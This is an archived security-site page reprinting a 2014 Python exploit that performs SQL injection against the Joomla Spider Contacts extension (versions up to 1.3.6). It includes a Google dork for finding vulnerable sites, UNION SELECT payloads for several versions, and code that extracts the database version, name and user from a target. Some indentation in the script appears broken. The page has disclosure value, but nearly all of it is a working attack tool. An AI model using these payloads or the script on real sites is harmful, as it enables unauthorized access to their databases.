首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection
来源:http://www.homelab.it 作者:Viviani 发布时间:2014-09-12  
#!/usr/bin/env python
#
#
# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://web-dorado.com/
#
# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60 (fixed)
#   Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE (no fixed)
#
# Dork Google: inurl:option=com_spidercontacts
#
# Date : 2014-09-07
#
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#
#
#
######################
#
# PoC Exploit:
#
# http://localhost/joomla/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca
#
#
# "contacts_id" variables is not sanitized.
#
# Vulnerability Disclosure Timeline:
#
# 2014-09-07:  Discovered vulnerability
# 2014-09-09:  Vendor Notification
# 2014-09-10:  Vendor Response/Feedback 
# 2014-09-10:  Vendor Fix/Patch
# 2014-09-10:  Public Disclosure
  
import codecs
import httplib
import re
import sys
import socket
import optparse
  
banner = """
  
   $$$$$\                                   $$\                  $$$$$$\            $$\       $$\                      
   \__$$ |                                  $$ |                $$  __$$\           \__|      $$ |                     
      $$ | $$$$$$\   $$$$$$\  $$$$$$\$$$$\  $$ | $$$$$$\        $$ /  \__| $$$$$$\  $$\  $$$$$$$ | $$$$$$\   $$$$$$\   
      $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\ $$ | \____$$\       \$$$$$$\  $$  __$$\ $$ |$$  __$$ |$$  __$$\ $$  __$$\  
$$\   $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ |$$ | $$$$$$$ |       \____$$\ $$ /  $$ |$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__| 
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$ |$$  __$$ |      $$\   $$ |$$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |       
\$$$$$$  |\$$$$$$  |\$$$$$$  |$$ | $$ | $$ |$$ |\$$$$$$$ |      \$$$$$$  |$$$$$$$  |$$ |\$$$$$$$ |\$$$$$$$\ $$ |       
 \______/  \______/  \______/ \__| \__| \__|\__| \_______|       \______/ $$  ____/ \__| \_______| \_______|\__|       
                                                                          $$ |                                         
                                                                          $$ |                                         
                                                                          \__|                                         
 $$$$$$\                       $$\                           $$\                       $$\       $$$$$$\      $$$$$$\  
$$  __$$\                      $$ |                          $$ |                    $$$$ |     $$ ___$$\    $$  __$$\ 
$$ /  \__| $$$$$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$$\ $$$$$$\    $$$$$$$\       \_$$ |     \_/   $$ |   $$ /  \__|
$$ |      $$  __$$\ $$  __$$\\_$$  _|   \____$$\ $$  _____|\_$$  _|  $$  _____|        $$ |       $$$$$ /    $$$$$$$\  
$$ |      $$ /  $$ |$$ |  $$ | $$ |     $$$$$$$ |$$ /        $$ |    \$$$$$$\          $$ |       \___$$\    $$  __$$\ 
$$ |  $$\ $$ |  $$ |$$ |  $$ | $$ |$$\ $$  __$$ |$$ |        $$ |$$\  \____$$\         $$ |     $$\   $$ |   $$ /  $$ |
\$$$$$$  |\$$$$$$  |$$ |  $$ | \$$$$  |\$$$$$$$ |\$$$$$$$\   \$$$$  |$$$$$$$  |      $$$$$$\ $$\\$$$$$$  |$$\ $$$$$$  |
 \______/  \______/ \__|  \__|  \____/  \_______| \_______|   \____/ \_______/       \______|\__|\______/ \__|\______/ 
                                                                                                                         
                                                                                         j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi
  
                                             Written by:
  
                                                   Claudio Viviani
  
                                        http://www.homelab.it
  
                                                   info@homelab.it
                                       homelabit@protonmail.ch
  
                                  https://www.facebook.com/homelabit
                                    https://twitter.com/homelabit
                                         https://plus.google.com/+HomelabIt1/
                               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  
"""
  
C0mm4nds = dict()
C0mm4nds['DB VERS'] = 'VERSION'
C0mm4nds['DB NAME'] = 'DATABASE'
C0mm4nds['DB USER'] = 'CURRENT_USER'
  
def def_payload(payl):
    payl = payl
    return payl
  
  
def com_com_spidercalendar():
    com_spidercalendar = "index.php?option=com_spidercontacts&contact_id="+payload+"&view=showcontact&lang=ca"
    return com_spidercalendar
  
  
ver_spidercontacts = "administrator/components/com_spidercontacts/spidercontacts.xml"
  
vuln = 0
  
def cmdMySQL(cmd):
   SqlInjList = [
   # SQLi Spider Contacts 1.3.6
'1%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
   # SQLi Spider Contacts 1.3.5 - 1.3.4
'1%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
   # SQLi Spider Contacts 1.3.3
'1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
   # SQLi Spider Contacts 1.3
'1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
   # SQLi Spider Contacts 1.2 - 1.1 - 1.0
'-9900%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
   ]
   return SqlInjList
  
def checkProtocol(pr):
  
    parsedHost = ""
    PORT =  m_oOptions.port
  
    if pr[0:8] == "https://":
        parsedHost = pr[8:]
  
        if parsedHost.endswith("/"):
            parsedHost = parsedHost.replace("/","")
            if PORT == 0:
                PORT = 443
  
        PROTO = httplib.HTTPSConnection(parsedHost, PORT)
  
    elif pr[0:7] == "http://":
        parsedHost = pr[7:]
        if parsedHost.endswith("/"):
            parsedHost = parsedHost.replace("/","")
        if PORT == 0:
            PORT = 80
  
        PROTO = httplib.HTTPConnection(parsedHost, PORT)
  
    else:
        parsedHost = pr
  
        if parsedHost.endswith("/"):
            parsedHost = parsedHost.replace("/","")
        if PORT == 0:
            PORT = 80
  
        PROTO = httplib.HTTPConnection(parsedHost, PORT)
  
    return PROTO, parsedHost
  
def connection(addr, url_string):
  
    parsedHost = checkProtocol(addr)[1]
    PROTO =  checkProtocol(addr)[0]
    try:
        socket.gethostbyname(parsedHost)
  
    except socket.gaierror:
        print 'Hostname could not be resolved. Exiting'
        sys.exit()
  
    connection_req =  checkProtocol(addr)[0]
  
    try:
        connection_req.request('GET', url_string)
    except socket.error:
        print('Connection Error')
        sys.exit(1)
  
    response = connection_req.getresponse()
    reader = codecs.getreader("utf-8")(response)
  
    return {'response':response, 'reader':reader}
  
  
if __name__ == '__main__':
    m_oOpts = optparse.OptionParser("%prog -H http[s]://Host_or_IP [-b, --base base_dir] [-p, --port PORT]")
    m_oOpts.add_option('--host', '-H', action='store', type='string',
        help='The address of the host running Spider Contacts extension(required)')
    m_oOpts.add_option('--base', '-b', action='store', type='string', default="/",
    help='base dir joomla installation, default "/")')
    m_oOpts.add_option('--port', '-p', action='store', type='int', default=0,
        help='The port on which the daemon is running (default 80)')
  
    m_oOptions, remainder = m_oOpts.parse_args()
    m_nHost = m_oOptions.host
    m_nPort = m_oOptions.port
    m_nBase = m_oOptions.base
  
    if not m_nHost:
        print(banner)       
        print m_oOpts.format_help()
        sys.exit(1)
  
    print(banner)
  
    if m_nBase != "/":
    if m_nBase[0] == "/":
        m_nBase = m_nBase[1:]
        if m_nBase[-1] == "/":
            m_nBase = m_nBase[:-1]
    else:
        if m_nBase[-1] == "/":
            m_nBase = m_nBase[:-1]
    m_nBase = '/'+m_nBase+'/'
  
    payload = def_payload('1%27')
    com_spidercalendar = com_com_spidercalendar()
    # Start connection to host for Joomla Spider Contacts vulnerability
    response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
    reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
    # Read connection code number
    getcode = response.status
  
    print("[+] Searching for Joomla Spider Contacts vulnerability...")
    print("[+]")
      
    if getcode != 404:
        for lines in reader:
            if not lines.find("spidercontacts_contacts.id") == -1:
        print("[!] Boolean SQL injection vulnerability FOUND!")
                print("[+]")
                print("[+] Detection version in progress....")
        print("[+]")
      
                try:
                    response = connection(m_nHost, m_nBase+ver_spidercontacts).values()[0]
                    reader = connection(m_nHost, m_nBase+ver_spidercontacts).values()[1]
                    getcode = response.status
                    if getcode != 404:
                        for line_version in reader:
                           if not line_version.find("<version>") == -1:
                               VER = re.compile('>(.*?)<').search(line_version).group(1)
                               VER_REP = VER.replace(".","")
                               if int(VER_REP) > 136 or int(VER_REP[0]) == 2:
                                   print("[X] VERSION: "+VER)
                                   print("[X] Joomla Spider Contacts => 1.3.7 are not vulnerables")
                                   sys.exit(1)
                               elif int(VER_REP) == 136:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   print("[+]")
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                       try:
                                           paysql = cmdMySQL(cmdsqli)[0]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                          print("[+]")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                                      break
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                                           sys.exit(1)
                               elif int(VER_REP) == 135 or int(VER_REP) == 134:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   print("[+]")
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                       try:
                                           paysql = cmdMySQL(cmdsqli)[1]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                          print("[+]")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                                      break
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                                           sys.exit(1)
                               elif int(VER_REP) == 133:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   print("[+]")
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                       try:
                                           paysql = cmdMySQL(cmdsqli)[2]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                          print("[+]")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                                      break
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                                           sys.exit(1)
                               elif int(VER_REP) == 13:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   print("[+]")
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                       try:
                                           paysql = cmdMySQL(cmdsqli)[3]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                          print("[+]")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                                      break
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                                           sys.exit(1)
                               elif int(VER_REP[:2]) == 10 or int(VER_REP[:2]) == 11 or int(VER_REP[:2]) == 12:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   print("[+]")
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                       try:
                                           paysql = cmdMySQL(cmdsqli)[4]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                          print("[+]")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                                      break
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                                           sys.exit(1)
                               else:
                                   print("[-] EXTENSION VERSION: Unknown :(")
                                   sys.exit(0)
                        if int(vuln) == 0:
                            # VERSION NOT VULNERABLE :(
                            print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
                            sys.exit(1)
                        else:
                            sys.exit(0)
                except socket.error:
                    print('[X] Connection was lost please retry')
                    sys.exit(1)
    # NO SQL BLIND DETECTED
    print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
    sys.exit(1)
    else:
        print('[X] URL "'+m_nHost+m_nBase+com_spidercalendar+'" NOT FOUND')

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Onlineon E-Ticaret Database Di
·WWW File Share Pro 7.0 Denial
·SolarWinds Storage Manager Aut
·Apple iOS 7.1.2 Merge Apps Ser
·ManageEngine Eventlog Analyzer
·LeapFTP 3.1.0 URL Handling Buf
·Railo 4.2.1 Remote File Inclus
·Google Chrome 31.0 XSS Auditor
·Rooted SSH/SFTP Daemon Default
·Android Browser Same Origin Po
·HttpFileServer 2.3.x Remote Co
·Wing FTP Server Authenticated
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved